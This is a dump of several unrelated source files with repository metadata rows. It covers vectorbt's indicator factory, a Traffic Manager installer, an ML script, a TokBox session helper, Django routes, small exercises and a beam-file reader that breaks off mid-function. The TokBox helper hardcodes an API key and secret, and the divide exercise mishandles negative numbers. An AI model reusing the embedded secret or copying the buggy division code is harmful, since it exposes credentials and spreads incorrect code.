numba_loop (bool): Whether to loop using Numba.
Set to True when iterating large number of times over small input,
but note that Numba doesn't support variable keyword arguments.
**kwargs: Keyword arguments passed to `IndicatorFactory.from_custom_func`.
Returns:
Indicator
Additionally, each run method now supports `use_ray` argument, which indicates
whether to use Ray to execute `apply_func` in parallel. Only works with `numba_loop` set to False.
See `vectorbt.base.combine_fns.ray_apply` for related keyword arguments.
## Example
The following example produces the same indicator as the `IndicatorFactory.from_custom_func` example.
```python-repl
>>> @njit
... def apply_func_nb(ts1, ts2, p1, p2, arg1, arg2):
... return ts1 * p1 + arg1, ts2 * p2 + arg2
>>> MyInd = vbt.IndicatorFactory(
... input_names=['ts1', 'ts2'],
... param_names=['p1', 'p2'],
... output_names=['o1', 'o2']
... ).from_apply_func(
... apply_func_nb, var_args=True,
... kwargs_to_args=['arg2'], arg2=200)
>>> myInd = MyInd.run(price, price * 2, [1, 2], [3, 4], 100)
>>> myInd.o1
custom_p1 1 2
custom_p2 3 4
a b a b
2020-01-01 101.0 105.0 102.0 110.0
2020-01-02 102.0 104.0 104.0 108.0
2020-01-03 103.0 103.0 106.0 106.0
2020-01-04 104.0 102.0 108.0 104.0
2020-01-05 105.0 101.0 110.0 102.0
>>> myInd.o2
custom_p1 1 2
custom_p2 3 4
a b a b
2020-01-01 206.0 230.0 208.0 240.0
2020-01-02 212.0 224.0 216.0 232.0
2020-01-03 218.0 218.0 224.0 224.0
2020-01-04 224.0 212.0 232.0 216.0
2020-01-05 230.0 206.0 240.0 208.0
```
"""
Indicator = self.Indicator
setattr(Indicator, 'apply_func', apply_func)
if kwargs_to_args is None:
kwargs_to_args = []
module_name = self.module_name
output_names = self.output_names
in_output_names = self.in_output_names
param_names = self.param_names
num_ret_outputs = len(output_names)
# Build a function that selects a parameter tuple
# Do it here to avoid compilation with Numba every time custom_func is run
_0 = "i"
_0 += ", args_before"
_0 += ", input_tuple"
if len(in_output_names) > 0:
_0 += ", in_output_tuples"
if len(param_names) > 0:
_0 += ", param_tuples"
_0 += ", *args"
if not numba_loop:
_0 += ", **_kwargs"
_1 = "*args_before"
if pass_packed:
_1 += ", input_tuple"
if len(in_output_names) > 0:
_1 += ", in_output_tuples[i]"
else:
_1 += ", ()"
if len(param_names) > 0:
_1 += ", param_tuples[i]"
else:
_1 += ", ()"
else:
_1 += ", *input_tuple"
if len(in_output_names) > 0:
_1 += ", *in_output_tuples[i]"
if len(param_names) > 0:
_1 += ", *param_tuples[i]"
_1 += ", *args"
if not numba_loop:
_1 += ", **_kwargs"
func_str = "def select_params_func({0}):\n return apply_func({1})".format(_0, _1)
scope = {'apply_func': apply_func}
filename = inspect.getfile(lambda: None)
code = compile(func_str, filename, 'single')
exec(code, scope)
select_params_func = scope['select_params_func']
if module_name is not None:
select_params_func.__module__ = module_name
if numba_loop:
select_params_func = njit(select_params_func)
def custom_func(input_list, in_output_list, param_list, *args, input_shape=None,
col=None, flex_2d=None, return_cache=False, use_cache=None, use_ray=False, **_kwargs):
"""Custom function that forwards inputs and parameters to `apply_func`."""
if use_ray:
if len(in_output_names) > 0:
raise ValueError("Ray doesn't support in-place outputs")
if numba_loop:
if use_ray:
raise ValueError("Ray cannot be used within Numba")
if num_ret_outputs > 1:
apply_and_concat_func = combine_fns.apply_and_concat_multiple_nb
elif num_ret_outputs == 1:
apply_and_concat_func = combine_fns.apply_and_concat_one_nb
else:
apply_and_concat_func = combine_fns.apply_and_concat_none_nb
else:
if num_ret_outputs > 1:
if use_ray:
apply_and_concat_func = combine_fns.apply_and_concat_multiple_ray
else:
apply_and_concat_func = combine_fns.apply_and_concat_multiple
elif num_ret_outputs == 1:
if use_ray:
apply_and_concat_func = combine_fns.apply_and_concat_one_ray
else:
apply_and_concat_func = combine_fns.apply_and_concat_one
else:
if use_ray:
raise ValueError("Ray requires regular outputs")
apply_and_concat_func = combine_fns.apply_and_concat_none
n_params = len(param_list[0]) if len(param_list) > 0 else 1
input_tuple = tuple(input_list)
in_output_tuples = list(zip(*in_output_list))
param_tuples = list(zip(*param_list))
args_before = ()
if input_shape is not None and 'input_shape' not in kwargs_to_args:
args_before += (input_shape,)
if col is not None and 'col' not in kwargs_to_args:
args_before += (col,)
# Pass some keyword arguments as positional (required by numba)
more_args = ()
for key in kwargs_to_args:
value = _kwargs.pop(key) # important: remove from kwargs
more_args += (value,)
if flex_2d is not None and 'flex_2d' not in kwargs_to_args:
more_args += (flex_2d,)
# Caching
cache = use_cache
if cache is None and cache_func is not None:
_in_output_list = in_output_list
_param_list = param_list
if checks.is_numba_func(cache_func):
if len(in_output_list) > 0:
_in_output_list = [to_typed_list(in_outputs) for in_outputs in in_output_list]
if len(param_list) > 0:
_param_list = [to_typed_list(params) for params in param_list]
cache = cache_func(
*args_before,
*input_tuple,
*_in_output_list,
*_param_list,
*args,
*more_args,
**_kwargs
)
if return_cache:
return cache
if cache is None:
cache = ()
if not isinstance(cache, tuple):
cache = (cache,)
if len(in_output_names) > 0:
_in_output_tuples = in_output_tuples
if numba_loop:
_in_output_tuples = to_typed_list(_in_output_tuples)
_in_output_tuples = (_in_output_tuples,)
else:
_in_output_tuples = ()
if len(param_names) > 0:
_param_tuples = param_tuples
if numba_loop:
_param_tuples = to_typed_list(_param_tuples)
_param_tuples = (_param_tuples,)
else:
_param_tuples = ()
return apply_and_concat_func(
n_params,
select_params_func,
args_before,
input_tuple,
*_in_output_tuples,
*_param_tuples,
*args,
*more_args,
*cache,
**_kwargs
)
return self.from_custom_func(custom_func, as_lists=True, **kwargs)
@classmethod
def from_talib(cls, func_name, init_kwargs=None, **kwargs):
"""Build indicator class around a TA-Lib function.
Requires [TA-Lib](https://github.com/mrjbq7/ta-lib) installed.
For input, parameter and output names, see [docs](https://github.com/mrjbq7/ta-lib/blob/master/docs/index.md).
Args:
func_name (str): Function name.
init_kwargs (dict): Keyword arguments passed to `IndicatorFactory`.
**kwargs: Keyword arguments passed to `IndicatorFactory.from_custom_func`.
Returns:
Indicator
## Example
```python-repl
>>> SMA = vbt.IndicatorFactory.from_talib('SMA')
>>> sma = SMA.run(price, timeperiod=[2, 3])
>>> sma.real
sma_timeperiod 2 3
a b a b
2020-01-01 NaN NaN NaN NaN
2020-01-02 1.5 4.5 NaN NaN
2020-01-03 2.5 3.5 2.0 4.0
2020-01-04 3.5 2.5 3.0 3.0
2020-01-05 4.5 1.5 4.0 2.0
```
To get help on a function, use the `help` command:
```python-repl
>>> help(SMA.run)
Help on method run:
run(close, timeperiod=30, short_name='sma', hide_params=None, hide_default=True, **kwargs) method of builtins.type instance
Run `SMA` indicator.
* Inputs: `close`
* Parameters: `timeperiod`
* Outputs: `real`
Pass a list of parameter names as `hide_params` to hide their column levels.
Set `hide_default` to False to show the column levels of the parameters with a default value.
Other keyword arguments are passed to `vectorbt.indicators.factory.run_pipeline`.
```
"""
import talib
from talib import abstract
talib_func = getattr(talib, func_name)
info = abstract.Function(func_name)._Function__info
input_names = []
for in_names in info['input_names'].values():
if isinstance(in_names, (list, tuple)):
input_names.extend(list(in_names))
else:
input_names.append(in_names)
class_name = info['name']
class_docstring = "{}, {}".format(info['display_name'], info['group'])
short_name = info['name'].lower()
param_names = list(info['parameters'].keys())
output_names = info['output_names']
output_flags = info['output_flags']
def apply_func(input_list, _, param_tuple):
# TA-Lib functions can only process 1-dim arrays
n_input_cols = input_list[0].shape[1]
outputs = []
for col in range(n_input_cols):
outputs.append(talib_func(
*map(lambda x: x[:, col], input_list),
*param_tuple
))
if isinstance(outputs[0], tuple): # multiple outputs
outputs = list(zip(*outputs))
return list(map(np.column_stack, outputs))
return np.column_stack(outputs)
TALibIndicator = cls(
**merge_dicts(
dict(
class_name=class_name,
class_docstring=class_docstring,
short_name=short_name,
input_names=input_names,
param_names=param_names,
output_names=output_names,
output_flags=output_flags
),
init_kwargs
)
).from_apply_func(
apply_func,
pass_packed=True,
**info['parameters'],
**kwargs
)
return TALibIndicator
| [
"olegpolakow@gmail.com"
] | olegpolakow@gmail.com |
9f9a52b64939622a3491164e9c45cef35a97cf00 | 75a31c996a8f90f5f2335fd5a14bf772d426040e | /practice.py | 2178620b68da340bac9a800e4430effb8f288bb9 | [] | no_license | bharadwaj08/Python | 067baeb05e6a04f8748a0da54b2e1b9184e27285 | e0ed412c5a91a9b8146b68b98e4e7ba7bfc0fe37 | refs/heads/master | 2021-06-03T03:40:03.773261 | 2020-07-04T10:48:52 | 2020-07-04T10:48:52 | 107,049,047 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 96 | py | # -*- coding: utf-8 -*-
"""
Created on Wed Apr 8 20:27:54 2020
@author: bbsbh
"""
import numpy | [
"bbs.bharadwaj@gmail.com"
] | bbs.bharadwaj@gmail.com |
d0d6358a5098af9cd90630433d8c73fd15a182c0 | 479052653f68882ca79edab9be3a3cf73eebb7af | /examples/brocade-traffic-manager/traffic-manager-installer.py | 23646232515939943655acc7397a860dac64d049 | [
"MIT"
] | permissive | CalvinHartwell/answers | a614fca3caf3fcadaff0925b6ab38d54497f2082 | e10f90b1e32b6c2ba8c42be6e57dafb810a8d1e0 | refs/heads/master | 2021-01-23T07:21:38.195036 | 2015-04-11T22:46:00 | 2015-04-11T22:46:00 | 32,049,011 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,780 | py | #==============================================================================
# Answers Python Library - Brocade Traffic Manager Installer Example (Riverbed)
# Copyright Calvin Hartwell 2015.
# Distributed under the MIT License.
# (See accompanying file LICENSE or copy at http://opensource.org/licenses/MIT)
#==============================================================================
from answers import *
# Riverbed Traffic Manager Automatic Installer - Version 9.9
# Download Traffic Manager Repo from archive using wget (Riverbed/Brocade url is tgz archive for traffic manager 9.9)
TrafficManagerRepo = Answers('wget http://support.riverbed.com/bin/support/download?sid=89ckt05tr2m4htokv1sphofgt3 -O ZeusTM_latest.tgz')
TrafficManagerRepo.debugMode = True
TrafficManagerRepo.timeoutInSeconds = 25
TrafficManagerRepo.Execute()
# Extract file (may vary on os)
ExtractTrafficManager = Answers('tar -zxvf ZeusTM_latest.tgz --directory /usr/tmp/')
ExtractTrafficManager.debugMode = True
ExtractTrafficManager.Execute()
# Create user group lbalancer
CreateGroup = Answers('groupadd lbalancer')
CreateGroup.debugMode = True
CreateGroup.timeoutInSeconds = 5
CreateGroup.Execute()
# Create user lbalancer
CreateUser = Answers('useradd -g lbalancer -s /sbin/nologin lbalancer')
CreateUser.debugMode = True
CreateUser.timeoutInSeconds = 5
CreateUser.Execute()
# Install and configure traffic manager
TrafficManagerInstall = Answers('/usr/tmp/ZeusTM_99_Linux-x86_64/zinstall', 'traffic-manager-answers.json')
TrafficManagerInstall.debugMode = True
TrafficManagerInstall.defaultAnswerMode = False
TrafficManagerInstall.logMode = True
TrafficManagerInstall.timeoutInSeconds = 10
TrafficManagerInstall.Execute()
# Traffic Manager GUI should now be running on http://fqdn:9090
| [
"mail@calvinhartwell.com"
] | mail@calvinhartwell.com |
bfc7e1d5b4d8a98fe867535b4bf17c95313f5c02 | 1d8fa33a3d25b8640745bfb2d8f74a844f82c09b | /mackl - 3 submission/process_reduceformice.py | 6525c370e37cf372b94c8d6bd0effa360e839be2 | [] | no_license | toycrane86/open-source-submissions | 8dc0341e8d65f74dd16a3e6afea50857d02b1d0e | 8ac2756672c5011434517e93e8411a781b2a22f8 | refs/heads/master | 2023-05-29T13:38:57.373486 | 2017-04-25T15:28:04 | 2017-04-25T15:28:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,014 | py | import numpy as np
import pandas as pd
from sklearn import preprocessing
from sklearn.ensemble import RandomForestRegressor
from sklearn.feature_selection import SelectKBest
from sklearn.feature_selection import chi2
from sklearn.feature_selection import mutual_info_regression
from sklearn.tree import DecisionTreeRegressor
## NEWBACKGROUND.CSV GENERATED FROM R SCRIPT ##
df = pd.read_csv("newbackground.csv", low_memory=False)
df = df.sort_values(by = 'challengeID', ascending = 1);
# df = pd.get_dummies(df)
# df = df.as_matrix()
outcomes = pd.read_csv("train.csv", low_memory=False)
# Get rows of training data that have reported gpa
outcomes_gpa = outcomes[pd.notnull(outcomes['gpa'])]
known_gpas = outcomes_gpa.challengeID
print(known_gpas)
# Extract the gpa's
test_outcomes = outcomes_gpa.gpa[1000:1165]
training_outcomes = outcomes_gpa.gpa[0:999]
# Extract rows of raw data
df = df.loc[df['challengeID'].isin(outcomes_gpa.challengeID)]
training_data = df.loc[df['challengeID'].isin(outcomes_gpa.challengeID[0:999])]
test_data = df.loc[df['challengeID'].isin(outcomes_gpa.challengeID[1000:1165])]
# replace NA with NaN
df = df.fillna(np.nan)
# impute replace NA's with mean
# imputer = preprocessing.Imputer(strategy = "most_frequent")
# df = imputer.fit(df)
# training_data = imputer.transform(training_data)
# test_data = imputer.transform(test_data)
print(type(training_data))
# selector = SelectKBest(mutual_info_regression, k=10).fit(training_data, training_outcomes)
# idxs = selector.get_support(indices = True)
# training_data = selector.transform(training_data)
# test_data = test_data[:,idxs]
# # Bootstrap the training set #
clf_rf = RandomForestRegressor()
clf_rf.fit(training_data, training_outcomes)
print(clf_rf.score(test_data, test_outcomes))
#print(outcomes_gpa.shape)
#print(clf_rf.score(df, outcomes_gpa.gpa))
# print("Done")
## Standardize the data set ##
#scaler = preprocessing.StandardScaler()
#normalized_training_set = scaler.fit_transform(training_set);
| [
"noreply@github.com"
] | toycrane86.noreply@github.com |
9046bd343d91d64608b2ade4e3fd1501b6404f0e | 82a3c0a7f678fca05e92cf40e312b61c0e6825b0 | /prioritization_methods/rwr/dada_and_rwr/deg_match_bin/iterator.py | 384eb3c75bc6f22e8a0c772c40af8a6cd187abb5 | [] | no_license | arp1561/SRM-PPI | 42308ef75bd84615ac4ef163971021207576641a | 5b9fa32d007b07c6b3b321a66ccd4f1d6d9ee167 | refs/heads/master | 2020-03-19T17:04:29.640634 | 2018-06-09T17:11:37 | 2018-06-09T17:11:37 | 136,743,012 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 420 | py | import pandas as pd
import pickle
import sort_all_nodes_folder as san
iter = 0
while iter<15:
path = "/home/arpit/github/SRM-PPI/prioritization_methods/rwr/components/result/connected_components_"+str(iter)+".txt"
folder = "component_bin/"+str(iter+1)
components = pd.read_csv(path,delim_whitespace="",header=None)
components=components[0]
san.bin_list(folder,components)
print iter
iter+=1
| [
"joshiarpit2@gmail.com"
] | joshiarpit2@gmail.com |
90c28a1b24aacc733867f9243c3ddb46b00fdbb6 | f6ea8a327b7ca16713009817d6344c6e2252527c | /services/tokbox.py | 86bd587359fae645452932bafbe3239953187ced | [] | no_license | DenerosArmy/pjwing | 8f3efa33de153fe5cc0c49bee9f20ec7f7b68ff5 | 74074f68cb21b1643966ee02d2696cc577724996 | refs/heads/master | 2020-04-01T19:34:10.888418 | 2012-06-24T19:56:18 | 2012-06-24T19:56:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 675 | py | import OpenTokSDK
api_key = "14260652"
api_secret = "4611823556deeea92d01eea637831386e4d50d3d"
session_address = "https://api.opentok.com/hl"
def create_session():
opentok_sdk = OpenTokSDK.OpenTokSDK(api_key, api_secret)
session_properties = {OpenTokSDK.SessionProperties.p2p_preference: "enabled"}
session = opentok_sdk.create_session(session_address, session_properties)
session_id = session.session_id
return session_id
def generate_token(session_id):
opentok_sdk = OpenTokSDK.OpenTokSDK(api_key, api_secret)
session = opentok_sdk.create_session(session_address)
token = opentok_sdk.generate_token(session.session_id)
return token
| [
"richzeng@gmail.com"
] | richzeng@gmail.com |
36429352c24ff8aa254107d967821ed03257204a | 1d76ea9eb9e13f791b7dcfebaa5fe221a6549c63 | /turtle0.py | 1a86328ccb3dc2a17b8eff23c5abe49021955a07 | [] | no_license | elpargo/py036intro | debd8da401015d087f356dbeb102b0fb29eb3a69 | 6a50ad0d0f7f839897501cff74cfb5e0fcf186c1 | refs/heads/master | 2016-09-09T20:18:00.272836 | 2014-03-15T09:23:13 | 2014-03-15T09:23:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 26 | py | print "Hi!, I'm a turtle"
| [
"jorge.vargas@gmail.com"
] | jorge.vargas@gmail.com |
99cd0951dbf516aa230f490f055c4a54a9091f1b | f9c721584974a781ddb0d139cdb13b1b24c93a40 | /semmc-fuzzer/fuzzermon/fuzzermon/fuzzermon/urls.py | 40d85584c2460f5474d224569056855fcb2429a2 | [
"BSD-3-Clause"
] | permissive | GaloisInc/semmc | 15b54c2c37b5b0224d46cc3f76e026b0f67822d4 | 2147ee3e7b966ca635289efa742f9e5f4c7bb540 | refs/heads/master | 2023-08-30T03:18:56.878466 | 2023-08-08T19:14:14 | 2023-08-08T21:13:55 | 93,451,948 | 36 | 6 | BSD-3-Clause | 2023-08-08T21:13:56 | 2017-06-05T22:16:02 | Haskell | UTF-8 | Python | false | false | 1,086 | py | """fuzzermon URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
# from django.contrib import admin
from django.urls import path
from main import views
urlpatterns = [
path('', views.arch_list),
path('arch/<int:arch_id>/', views.view_arch),
path('opcode/<int:opcode_id>/', views.view_opcode),
path('opcode/<int:opcode_id>/<str:result_type>/', views.view_opcode),
path('test/<int:test_id>/', views.view_test),
path('upload_batch', views.upload_batch),
# path('admin/', admin.site.urls),
]
| [
"jtd@galois.com"
] | jtd@galois.com |
66c8de8394149c6687a1a32c885579a99c7dadc2 | b4cb52481ae7d4352688bc8b03d0e539fc896756 | /recursion/divide_two.py | 7194c5a4421e2119eead1b09985fe4925ff79ba6 | [] | no_license | kaedub/data-structures-and-algorithms | 65a4af598a37f13203761b8bb7e0f7b84f7143b5 | 950c05a0fa2a0996966f3db55ca79c4a2e0cbf8d | refs/heads/master | 2020-04-12T13:41:30.598651 | 2019-01-05T20:24:14 | 2019-01-05T20:24:14 | 162,529,117 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 491 | py | ########################################
# Divide without using division, multiple, or modulo
#
# Example 1:
#
# Input: dividend = 10, divisor = 3
# Output: 3
# Example 2:
#
# Input: dividend = 7, divisor = -3
# Output: -2
def divide(top, bot):
if top == bot:
return 1
quotient = 0
bot_inc = bot
while (abs(bot_inc) < top):
quotient += 1
bot_inc += bot
return quotient
print( divide(10, 3) )
print( divide(7, -3) )
print( divide(10, 10) )
print( divide(-7, 3) ) | [
"kaedub16@gmail.com"
] | kaedub16@gmail.com |
5371357b6bfd6b22adde4733ffe17c3a62a18f43 | 045d8c00ef592b16cae697bd248549454f1a38c7 | /EvaluationMetrics/WeightedCONNMatrix.py | 83362172fcda2f2ba1a5065035c1fe157a26832a | [] | no_license | ranganmostofa/Optimal-Learning-Schedules-for-Self-Organizing-Maps | b022c14f91c48046782bf90f673334cd875d1432 | 67983c1f23793400bcb0af45dd88c7f588ea6b75 | refs/heads/master | 2020-03-21T09:36:14.924879 | 2019-04-14T03:51:34 | 2019-04-14T03:51:35 | 138,408,301 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 325 | py | from WeightedCADJMatrix import WeightedCADJMatrix
class WeightedCONNMatrix:
"""
"""
@staticmethod
def compute(self_organizing_map, input_map):
wcadj_matrix = WeightedCADJMatrix.compute(self_organizing_map, input_map)
wconn_matrix = wcadj_matrix + wcadj_matrix.T
return wconn_matrix
| [
"rm48@rice.edu"
] | rm48@rice.edu |
8cf1a15642d330e409b9b8f3de5b9c053fe45d01 | ea1d88d99e854ceb7f5620bd371349acb51f6607 | /SimulationFramework/Modules/read_beam_file.py | 3b751981b3a0cbed54c6f0a08b7091980e5de51f | [] | no_license | VELA-CLARA-software/SimFramed | 7dee4efc86531662495eed1bf2a3e9ec8287b640 | b647590f8cb87ea2bffed6733012b6e9141032bb | refs/heads/master | 2022-12-07T05:13:46.486342 | 2020-08-10T13:52:13 | 2020-08-10T13:52:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 56,824 | py | import os, time, csv, sys, subprocess
import copy
import h5py
import numpy as np
import munch
import scipy.constants as constants
from scipy.spatial.distance import cdist
from scipy.spatial import ConvexHull
from scipy.stats import gaussian_kde
from itertools import compress
try:
import sdds
except:
print('sdds failed to load')
pass
sys.path.append(os.path.abspath(__file__+'/../../'))
import SimulationFramework.Modules.read_gdf_file as rgf
import SimulationFramework.Modules.minimumVolumeEllipse as mve
MVE = mve.EllipsoidTool()
class beam(munch.Munch):
particle_mass = constants.m_e
E0 = particle_mass * constants.speed_of_light**2
E0_eV = E0 / constants.elementary_charge
q_over_c = (constants.elementary_charge / constants.speed_of_light)
speed_of_light = constants.speed_of_light
def __init__(self, sddsindex=0):
self.beam = {}
self.sddsindex = sddsindex
def set_particle_mass(self, mass=constants.m_e):
self.particle_mass = mass
def normalise_to_ref_particle(self, array, index=0,subtractmean=False):
array = copy.copy(array)
array[1:] = array[0] + array[1:]
if subtractmean:
array = array - array[0]#np.mean(array)
return array
def reset_dicts(self):
self.beam = {}
self.twiss = {}
self.slice = {}
self._tbins = []
self._pbins = []
def read_SDDS_beam_file(self, fileName, charge=None, ascii=False):
self.reset_dicts()
self.sdds = sdds.SDDS(self.sddsindex)
self.sdds.load(fileName)
for col in range(len(self.sdds.columnName)):
if len(self.sdds.columnData[col]) == 1:
self.beam[self.sdds.columnName[col]] = np.array(self.sdds.columnData[col][0])
else:
self.beam[self.sdds.columnName[col]] = np.array(self.sdds.columnData[col])
self.SDDSparameters = dict()
for param in range(len(self.sdds.parameterName)):
self.SDDSparameters[self.sdds.parameterName[param]] = self.sdds.parameterData[param]
# print 'self.SDDSparameterNames = ', self.SDDSparameterNames
self.beam['code'] = "SDDS"
cp = self.beam['p'] * self.E0_eV
cpz = cp / np.sqrt(self.beam['xp']**2 + self.beam['yp']**2 + 1)
cpx = self.beam['xp'] * cpz
cpy = self.beam['yp'] * cpz
self.beam['px'] = cpx * self.q_over_c
self.beam['py'] = cpy * self.q_over_c
self.beam['pz'] = cpz * self.q_over_c
self.beam['t'] = self.beam['t']
self.beam['z'] = (-1*self.Bz * constants.speed_of_light) * (self.t-np.mean(self.t)) #np.full(len(self.t), 0)
if 'Charge' in self.SDDSparameters and len(self.SDDSparameters['Charge']) > 0:
self.beam['total_charge'] = self.SDDSparameters['Charge'][0]
elif charge is None:
self.beam['total_charge'] = 0
else:
self.beam['total_charge'] = charge
self.beam['charge'] = []
def write_SDDS_file(self, filename, ascii=False, xyzoffset=[0,0,0]):
"""Save an SDDS file using the SDDS class."""
xoffset = xyzoffset[0]
yoffset = xyzoffset[1]
zoffset = xyzoffset[2] # Don't think I need this because we are using t anyway...
x = sdds.SDDS(self.sddsindex)
if ascii:
x.mode = x.SDDS_ASCII
else:
x.mode = x.SDDS_BINARY
# {x, xp, y, yp, t, p, particleID}
Cnames = ["x", "xp", "y", "yp", "t","p"]
Ccolumns = ['x', 'xp', 'y', 'yp', 't', 'BetaGamma']
Ctypes = [x.SDDS_DOUBLE, x.SDDS_DOUBLE, x.SDDS_DOUBLE, x.SDDS_DOUBLE, x.SDDS_DOUBLE, x.SDDS_DOUBLE]
Csymbols = ["", "x'","","y'","",""]
Cunits = ["m","","m","","s","m$be$nc"]
Ccolumns = [np.array(self.x) - float(xoffset), self.xp, np.array(self.y) - float(yoffset), self.yp, self.t , self.cp/self.E0_eV]
# {Step, pCentral, Charge, Particles, IDSlotsPerBunch}
Pnames = ["pCentral", "Charge", "Particles"]
Ptypes = [x.SDDS_DOUBLE, x.SDDS_DOUBLE, x.SDDS_LONG]
Psymbols = ["p$bcen$n", "", ""]
Punits = ["m$be$nc", "C", ""]
parameterData = [[np.mean(self.BetaGamma)], [abs(self.beam['total_charge'])], [len(self.x)]]
for i in range(len(Ptypes)):
x.defineParameter(Pnames[i], Psymbols[i], Punits[i],"","", Ptypes[i], "")
x.setParameterValueList(Pnames[i], parameterData[i])
for i in range(len(Ctypes)):
# name, symbol, units, description, formatString, type, fieldLength
x.defineColumn(Cnames[i], Csymbols[i], Cunits[i],"","", Ctypes[i], 0)
x.setColumnValueLists(Cnames[i], [list(Ccolumns[i])])
x.save(filename)
def set_beam_charge(self, charge):
self.beam['total_charge'] = charge
def read_csv_file(self, file, delimiter=' '):
with open(file, 'r') as f:
data = np.array([l for l in csv.reader(f, delimiter=delimiter, quoting=csv.QUOTE_NONNUMERIC, skipinitialspace=True)])
return data
def write_csv_file(self, file, data):
if sys.version_info[0] > 2:
with open(file, 'w', newline='') as f:
writer = csv.writer(f, delimiter=' ', quoting=csv.QUOTE_NONNUMERIC, skipinitialspace=True)
[writer.writerow(l) for l in data]
else:
with open(file, 'wb') as f:
writer = csv.writer(f, delimiter=' ', quoting=csv.QUOTE_NONNUMERIC, skipinitialspace=True)
[writer.writerow(l) for l in data]
def read_astra_beam_file(self, file, normaliseZ=False):
starttime = time.time()
self.reset_dicts()
data = self.read_csv_file(file)
# datanp = np.loadtxt(file)
self.interpret_astra_data(data, normaliseZ=normaliseZ)
# def read_hdf5_beam(self, data):
# self.reset_dicts()
# self.interpret_astra_data(data)
    def interpret_astra_data(self, data, normaliseZ=False):
        """Unpack a 10-column ASTRA particle array into self.beam.

        Row 0 is the ASTRA reference particle; z/cpz/clock of the remaining
        rows are stored relative to it and are made absolute here via
        normalise_to_ref_particle.  Particles with status == -1 keep their
        clock time as t; for all others t is rebuilt from (z - zref) and Bz.
        """
        x, y, z, cpx, cpy, cpz, clock, charge, index, status = np.transpose(data)
        zref = z[0]
        self.beam['code'] = "ASTRA"
        self.beam['reference_particle'] = data[0]
        # if normaliseZ:
        #     self.beam['reference_particle'][2] = 0
        self.beam['longitudinal_reference'] = 'z'
        znorm = self.normalise_to_ref_particle(z, subtractmean=True)
        z = self.normalise_to_ref_particle(z, subtractmean=False)
        cpz = self.normalise_to_ref_particle(cpz, subtractmean=False)
        clock = self.normalise_to_ref_particle(clock, subtractmean=True)
        cp = np.sqrt(cpx**2 + cpy**2 + cpz**2)
        self.beam['x'] = x
        self.beam['y'] = y
        self.beam['z'] = z
        # momenta scaled by q_over_c (presumably eV/c -> SI; confirm against q_over_c definition)
        self.beam['px'] = cpx * self.q_over_c
        self.beam['py'] = cpy * self.q_over_c
        self.beam['pz'] = cpz * self.q_over_c
        # factors of 1e-9: clock and charge arrive in nano-units
        self.beam['clock'] = 1.0e-9*clock
        self.beam['charge'] = 1.0e-9*charge
        self.beam['index'] = index
        self.beam['status'] = status
        # print self.Bz
        self.beam['t'] = [clock if status == -1 else ((z-zref) / (-1 * Bz * constants.speed_of_light)) for status, z, Bz, clock in zip(self.beam['status'], z, self.Bz, self.beam['clock'])]
        # self.beam['t'] = self.z / (1 * self.Bz * constants.speed_of_light)#[time if status is -1 else 0 for time, status in zip(clock, status)]#
        self.beam['total_charge'] = np.sum(self.beam['charge'])
def read_csrtrack_beam_file(self, file):
self.reset_dicts()
data = self.read_csv_file(file)
self.beam['code'] = "CSRTrack"
self.beam['reference_particle'] = data[0]
self.beam['longitudinal_reference'] = 'z'
z, x, y, cpz, cpx, cpy, charge = np.transpose(data[1:])
z = self.normalise_to_ref_particle(z, subtractmean=False)
cpz = self.normalise_to_ref_particle(cpz, subtractmean=False)
cp = np.sqrt(cpx**2 + cpy**2 + cpz**2)
self.beam['x'] = x
self.beam['y'] = y
self.beam['z'] = z
self.beam['px'] = cpx * self.q_over_c
self.beam['py'] = cpy * self.q_over_c
self.beam['pz'] = cpz * self.q_over_c
self.beam['clock'] = np.full(len(self.x), 0)
self.beam['clock'][0] = data[0, 0] * 1e-9
self.beam['index'] = np.full(len(self.x), 5)
self.beam['status'] = np.full(len(self.x), 1)
self.beam['t'] = self.z / (-1 * self.Bz * constants.speed_of_light)# [time if status is -1 else 0 for time, status in zip(clock, self.beam['status'])]
self.beam['charge'] = charge
self.beam['total_charge'] = np.sum(self.beam['charge'])
    def read_vsim_h5_beam_file(self, filename, charge=70e-12, interval=1):
        """Load a VSim HDF5 'BeamElectrons' dataset into self.beam.

        interval subsamples the macro-particles; charge (Coulombs) supplies
        the total bunch charge since the file carries no charge column.
        Momenta are obtained by multiplying the stored values by the
        particle mass (so the file presumably stores velocity-like
        quantities - confirm against the VSim output convention).
        """
        self.reset_dicts()
        with h5py.File(filename, "r") as h5file:
            data = np.array(h5file.get('/BeamElectrons'))[1:-1:interval]
        z, y, x, cpz, cpy, cpx = data.transpose()
        self.beam['code'] = "VSIM"
        self.beam['longitudinal_reference'] = 'z'
        cp = np.sqrt(cpx**2 + cpy**2 + cpz**2)
        self.beam['x'] = x
        self.beam['y'] = y
        self.beam['z'] = z
        self.beam['px'] = cpx * self.particle_mass
        self.beam['py'] = cpy * self.particle_mass
        self.beam['pz'] = cpz * self.particle_mass
        # t reconstructed from z and beta_z (particles assumed travelling in +z)
        self.beam['t'] = [(z / (-1 * Bz * constants.speed_of_light)) for z, Bz in zip(self.z, self.Bz)]
        # self.beam['t'] = self.z / (1 * self.Bz * constants.speed_of_light)#[time if status is -1 else 0 for time, status in zip(clock, status)]#
        self.beam['total_charge'] = charge
        self.beam['charge'] = []
    def read_pacey_beam_file(self, file, charge=250e-12):
        """Load a tab-delimited (x y z cpx cpy cpz) distribution into self.beam.

        charge (Coulombs) supplies the total bunch charge; this format has
        no per-particle charge column.
        """
        self.reset_dicts()
        data = self.read_csv_file(file, delimiter='\t')
        self.beam['code'] = "TPaceyASTRA"
        self.beam['longitudinal_reference'] = 'z'
